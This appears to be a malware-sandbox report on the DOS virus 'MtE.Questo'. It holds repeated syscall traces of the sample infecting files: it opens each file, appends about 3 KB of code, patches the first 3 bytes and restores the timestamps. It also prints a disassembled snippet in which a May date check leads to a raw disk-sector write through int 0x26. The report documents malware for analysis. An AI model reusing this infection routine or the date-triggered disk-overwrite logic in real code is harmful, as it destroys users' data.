Sample viewer

vx.netlux.org/Virus.DOS.MtE.Questo

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:41.823261911Z 26 PC: 12b6a | Set disk transfer address
2018-12-17T22:49:41.825149397Z 53 PC: 12b6f | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:41.827126081Z 37 PC: 12b79 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:41.82844Z 78 PC: 12b8a | Find first file
2018-12-17T22:49:41.835634276Z 67 PC: 12beb | Get or set file attributes
2018-12-17T22:49:41.854553591Z 61 PC: 12bf2 | Open file (Filename = 'v���&��8ju�E��P3��� �t�.nXú���>s')
2018-12-17T22:49:41.868026133Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:41.876083852Z 66 PC: 12c17 | Move file pointer
2018-12-17T22:49:41.878912406Z 87 PC: 12c2d | Get or set file date and time
2018-12-17T22:49:41.885916104Z 64 PC: 12c60 | Write file or device (Write 3177 bytes on handle 5)
2018-12-17T22:49:41.895774737Z 66 PC: 12c6f | Move file pointer
2018-12-17T22:49:41.899777056Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:41.903501003Z 87 PC: 12c80 | Get or set file date and time
2018-12-17T22:49:41.905753755Z 62 PC: 12c84 | Close file
2018-12-17T22:49:41.917032906Z 79 PC: 12b8a | Find next file
2018-12-17T22:49:41.921119434Z 67 PC: 12beb | Get or set file attributes
2018-12-17T22:49:41.9337691Z 61 PC: 12bf2 | Open file
2018-12-17T22:49:41.942603588Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:41.950449027Z 66 PC: 12c17 | Move file pointer
2018-12-17T22:49:41.952310044Z 87 PC: 12c2d | Get or set file date and time
2018-12-17T22:49:41.959628574Z 64 PC: 12c60 | Write file or device (Write 3045 bytes on handle 5)
2018-12-17T22:49:41.9692339Z 66 PC: 12c6f | Move file pointer
2018-12-17T22:49:41.970935006Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:41.974074835Z 87 PC: 12c80 | Get or set file date and time
2018-12-17T22:49:41.976636999Z 62 PC: 12c84 | Close file
2018-12-17T22:49:41.986144892Z 79 PC: 12b8a | Find next file
2018-12-17T22:49:41.989620272Z 67 PC: 12beb | Get or set file attributes
2018-12-17T22:49:42.001256554Z 61 PC: 12bf2 | Open file (Filename = 'ԗ&(��?Oa<�P�&�x�*�h�y�)�q˩(��IP *(� ������gD��3ڣ��@T\{t`7���j�B�Q#206�,��;J�>۞�Vxl����B⬭��[�\')
2018-12-17T22:49:42.009518215Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:42.019808198Z 66 PC: 12c17 | Move file pointer
2018-12-17T22:49:42.022676437Z 87 PC: 12c2d | Get or set file date and time
2018-12-17T22:49:42.033335052Z 64 PC: 12c60 | Write file or device (Write 2980 bytes on handle 5)
2018-12-17T22:49:42.042412376Z 66 PC: 12c6f | Move file pointer
2018-12-17T22:49:42.044851379Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:42.048170995Z 87 PC: 12c80 | Get or set file date and time
2018-12-17T22:49:42.049838789Z 62 PC: 12c84 | Close file
2018-12-17T22:49:42.058405965Z 79 PC: 12b8a | Find next file
2018-12-17T22:49:42.06167157Z 67 PC: 12beb | Get or set file attributes
2018-12-17T22:49:42.072563744Z 61 PC: 12bf2 | Open file (Filename = 'ĩx*&�0d��3��HE�j��:�e޻�K��]�.�Fpc�2/ ƕ�ݬ�|��i)')
2018-12-17T22:49:42.079777908Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:49:42.087614782Z 66 PC: 12c17 | Move file pointer
2018-12-17T22:49:42.089762276Z 87 PC: 12c2d | Get or set file date and time
2018-12-17T22:49:42.09748195Z 64 PC: 12c60 | Write file or device (Write 3043 bytes on handle 5)
2018-12-17T22:49:42.107091494Z 66 PC: 12c6f | Move file pointer
2018-12-17T22:49:42.108773214Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:49:42.11173623Z 87 PC: 12c80 | Get or set file date and time
2018-12-17T22:49:42.114373876Z 62 PC: 12c84 | Close file
2018-12-17T22:49:42.122846294Z 42 PC: 12bb4 | Get date 0x12bb4: cmp dh, 5
0x12bb7: jne 0x12bc9
0x12bb9: jmp 0x12bbc
0x12bbb: nop
0x12bbc: mov al, 0x80
0x12bbe: mov bx, 0x24a
0x12bc1: mov cx, 1
0x12bc4: mov dx, 0
0x12bc7: int 0x26
0x12bc9: pop dx
0x12bca: pop ds
0x12bcb: mov ax, 0x2524
0x12bce: int 0x21
0x12bd0: push ss
0x12bd1: pop ds
0x12bd2: mov dx, 0x80
0x12bd5: mov ah, 0x1a
0x12bd7: int 0x21
0x12bd9: push ds
0x12bda: pop es
2018-12-17T22:49:42.125571504Z 37 PC: 12bd0 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:49:42.127980299Z 26 PC: 12bd9 | Set disk transfer address
2018-12-17T22:49:42.129621343Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9969,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:51.200745401Z 26 PC: 12b6a | Set disk transfer address
2018-12-25T12:26:51.202683111Z 53 PC: 12b6f | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.203720966Z 37 PC: 12b79 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.204719224Z 78 PC: 12b8a | Find first file
2018-12-25T12:26:51.21379145Z 67 PC: 12beb | Get or set file attributes
2018-12-25T12:26:51.229792667Z 61 PC: 12bf2 | Open file (Filename = 'v���&��8ju�E��P3��� �t�.nXú���>s')
2018-12-25T12:26:51.236126793Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:51.242770599Z 66 PC: 12c17 | Move file pointer
2018-12-25T12:26:51.24409108Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:26:51.250263841Z 64 PC: 12c60 | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T12:26:51.258627004Z 66 PC: 12c6f | Move file pointer
2018-12-25T12:26:51.259828122Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:51.262333536Z 87 PC: 12c80 | Get or set file date and time
2018-12-25T12:26:51.263766347Z 62 PC: 12c84 | Close file
2018-12-25T12:26:51.271743003Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.274144318Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.284411375Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.291196782Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.29767535Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.298908483Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.306083014Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.31438375Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.315573676Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.318887435Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.320662787Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.328903843Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.332058472Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.34178294Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.349012648Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.355839369Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.357156485Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.363527048Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.374124548Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.375505672Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.378277641Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.381407076Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.387222833Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.389785769Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.39972971Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.406680545Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.41311916Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.415891256Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.422771614Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.430355398Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.432247958Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.434795982Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.436142574Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.45204493Z 42 PC: 12bb4 | Get date 0x12bb4: cmp dh, 5
0x12bb7: jne 0x12bc9
0x12bb9: jmp 0x12bbc
0x12bbb: nop
0x12bbc: mov al, 0x80
0x12bbe: mov bx, 0x24a
0x12bc1: mov cx, 1
0x12bc4: mov dx, 0
0x12bc7: int 0x26
0x12bc9: pop dx
0x12bca: pop ds
0x12bcb: mov ax, 0x2524
0x12bce: int 0x21
0x12bd0: push ss
0x12bd1: pop ds
0x12bd2: mov dx, 0x80
0x12bd5: mov ah, 0x1a
0x12bd7: int 0x21
0x12bd9: push ds
0x12bda: pop es
2018-12-25T12:26:51.455106763Z 37 PC: 12bd0 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.456204171Z 26 PC: 12bd9 | Set disk transfer address
2018-12-25T12:26:51.457776335Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9969,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:51.219569167Z 26 PC: 12b6a | Set disk transfer address
2018-12-25T12:26:51.220625963Z 53 PC: 12b6f | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.221839258Z 37 PC: 12b79 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.223216549Z 78 PC: 12b8a | Find first file
2018-12-25T12:26:51.22962068Z 67 PC: 12beb | Get or set file attributes
2018-12-25T12:26:51.245020692Z 61 PC: 12bf2 | Open file (Filename = 'v���&��8ju�E��P3��� �t�.nXú���>s')
2018-12-25T12:26:51.257648994Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:51.265196019Z 66 PC: 12c17 | Move file pointer
2018-12-25T12:26:51.267010604Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:26:51.275548858Z 64 PC: 12c60 | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T12:26:51.283675567Z 66 PC: 12c6f | Move file pointer
2018-12-25T12:26:51.284941424Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:51.288059105Z 87 PC: 12c80 | Get or set file date and time
2018-12-25T12:26:51.289582304Z 62 PC: 12c84 | Close file
2018-12-25T12:26:51.301658071Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.304683496Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.31430075Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.321586775Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.328228682Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.329978253Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.336680407Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.351127883Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.352956671Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.356096097Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.358126542Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.364183838Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.366812213Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.377155082Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.383839935Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.390489019Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.395315782Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.400373996Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.407912739Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.409516416Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.412395486Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.413766364Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.424722742Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.434638871Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.444574433Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.451121319Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.456755968Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.458435604Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.464029675Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.470290289Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.488022164Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.491075868Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.493863383Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.502414015Z 42 PC: 12bb4 | Get date 0x12bb4: cmp dh, 5
0x12bb7: jne 0x12bc9
0x12bb9: jmp 0x12bbc
0x12bbb: nop
0x12bbc: mov al, 0x80
0x12bbe: mov bx, 0x24a
0x12bc1: mov cx, 1
0x12bc4: mov dx, 0
0x12bc7: int 0x26
0x12bc9: pop dx
0x12bca: pop ds
0x12bcb: mov ax, 0x2524
0x12bce: int 0x21
0x12bd0: push ss
0x12bd1: pop ds
0x12bd2: mov dx, 0x80
0x12bd5: mov ah, 0x1a
0x12bd7: int 0x21
0x12bd9: push ds
0x12bda: pop es
2018-12-25T12:26:51.517494508Z 37 PC: 12bd0 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.51949705Z 26 PC: 12bd9 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9969,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:51.345764922Z 26 PC: 12b6a | Set disk transfer address
2018-12-25T12:26:51.349147058Z 53 PC: 12b6f | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.350499386Z 37 PC: 12b79 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.351644566Z 78 PC: 12b8a | Find first file
2018-12-25T12:26:51.358035699Z 67 PC: 12beb | Get or set file attributes
2018-12-25T12:26:51.374167783Z 61 PC: 12bf2 | Open file (Filename = 'v���&��8ju�E��P3��� �t�.nXú���>s')
2018-12-25T12:26:51.381658443Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:51.388833784Z 66 PC: 12c17 | Move file pointer
2018-12-25T12:26:51.390199421Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:26:51.396885871Z 64 PC: 12c60 | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T12:26:51.409881843Z 66 PC: 12c6f | Move file pointer
2018-12-25T12:26:51.411374897Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:51.413932211Z 87 PC: 12c80 | Get or set file date and time
2018-12-25T12:26:51.416665137Z 62 PC: 12c84 | Close file
2018-12-25T12:26:51.425000597Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.428225242Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.443152534Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.450010939Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.457152446Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.459044991Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.466060826Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.47458037Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.475911834Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.479926464Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.481705225Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.489996057Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.494190303Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.5041252Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.510948361Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.520196142Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.521817411Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.528464442Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.538785161Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.540462628Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.549336594Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.551824183Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.559625698Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.562461967Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.57289902Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.579645634Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.586487705Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.588980749Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.59642471Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.614934838Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.616729237Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.620505345Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.622031212Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.630858803Z 42 PC: 12bb4 | Get date 0x12bb4: cmp dh, 5
0x12bb7: jne 0x12bc9
0x12bb9: jmp 0x12bbc
0x12bbb: nop
0x12bbc: mov al, 0x80
0x12bbe: mov bx, 0x24a
0x12bc1: mov cx, 1
0x12bc4: mov dx, 0
0x12bc7: int 0x26
0x12bc9: pop dx
0x12bca: pop ds
0x12bcb: mov ax, 0x2524
0x12bce: int 0x21
0x12bd0: push ss
0x12bd1: pop ds
0x12bd2: mov dx, 0x80
0x12bd5: mov ah, 0x1a
0x12bd7: int 0x21
0x12bd9: push ds
0x12bda: pop es
2018-12-25T12:26:51.634024164Z 37 PC: 12bd0 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.635638017Z 26 PC: 12bd9 | Set disk transfer address
2018-12-25T12:26:51.637144021Z 9 PC: 12aa2 | Display string (String= 'Hello - Copyright S & S International, 1990 ')

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9969,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:26:51.39667239Z 26 PC: 12b6a | Set disk transfer address
2018-12-25T12:26:51.399228448Z 53 PC: 12b6f | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.400750186Z 37 PC: 12b79 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.402196322Z 78 PC: 12b8a | Find first file
2018-12-25T12:26:51.408867179Z 67 PC: 12beb | Get or set file attributes
2018-12-25T12:26:51.425263822Z 61 PC: 12bf2 | Open file (Filename = 'v���&��8ju�E��P3��� �t�.nXú���>s')
2018-12-25T12:26:51.431680866Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:26:51.438215499Z 66 PC: 12c17 | Move file pointer
2018-12-25T12:26:51.43949955Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:26:51.445513745Z 64 PC: 12c60 | Write file or device (Write 3177 bytes on handle 5)
2018-12-25T12:26:51.453927558Z 66 PC: 12c6f | Move file pointer
2018-12-25T12:26:51.456118938Z 64 PC: 12c79 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:26:51.458065646Z 87 PC: 12c80 | Get or set file date and time
2018-12-25T12:26:51.459304185Z 62 PC: 12c84 | Close file
2018-12-25T12:26:51.465293413Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.467202319Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.477216958Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.488056402Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.495137218Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.497007496Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.505352346Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.514022734Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.515435701Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.518984218Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.520939028Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.528912742Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.532635604Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.542805697Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.549725431Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.556642787Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.558805265Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.565685439Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.5741513Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.576136409Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.582924056Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.584975302Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.59379552Z 79 PC: 12b8a | Find next file (See above)
2018-12-25T12:26:51.596355699Z 67 PC: 12beb | Get or set file attributes (See above)
2018-12-25T12:26:51.606555242Z 61 PC: 12bf2 | Open file (See above)
2018-12-25T12:26:51.614229661Z 63 PC: 12bff | Read file or device (See above)
2018-12-25T12:26:51.621090884Z 66 PC: 12c17 | Move file pointer (See above)
2018-12-25T12:26:51.6228453Z 87 PC: 12c2d | Get or set file date and time (See above)
2018-12-25T12:26:51.631162586Z 64 PC: 12c60 | Write file or device (See above)
2018-12-25T12:26:51.63925166Z 66 PC: 12c6f | Move file pointer (See above)
2018-12-25T12:26:51.640509975Z 64 PC: 12c79 | Write file or device (See above)
2018-12-25T12:26:51.643894292Z 87 PC: 12c80 | Get or set file date and time (See above)
2018-12-25T12:26:51.645421564Z 62 PC: 12c84 | Close file (See above)
2018-12-25T12:26:51.65316179Z 42 PC: 12bb4 | Get date 0x12bb4: cmp dh, 5
0x12bb7: jne 0x12bc9
0x12bb9: jmp 0x12bbc
0x12bbb: nop
0x12bbc: mov al, 0x80
0x12bbe: mov bx, 0x24a
0x12bc1: mov cx, 1
0x12bc4: mov dx, 0
0x12bc7: int 0x26
0x12bc9: pop dx
0x12bca: pop ds
0x12bcb: mov ax, 0x2524
0x12bce: int 0x21
0x12bd0: push ss
0x12bd1: pop ds
0x12bd2: mov dx, 0x80
0x12bd5: mov ah, 0x1a
0x12bd7: int 0x21
0x12bd9: push ds
0x12bda: pop es
2018-12-25T12:26:51.656478214Z 37 PC: 12bd0 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:26:51.657706301Z 26 PC: 12bd9 | Set disk transfer address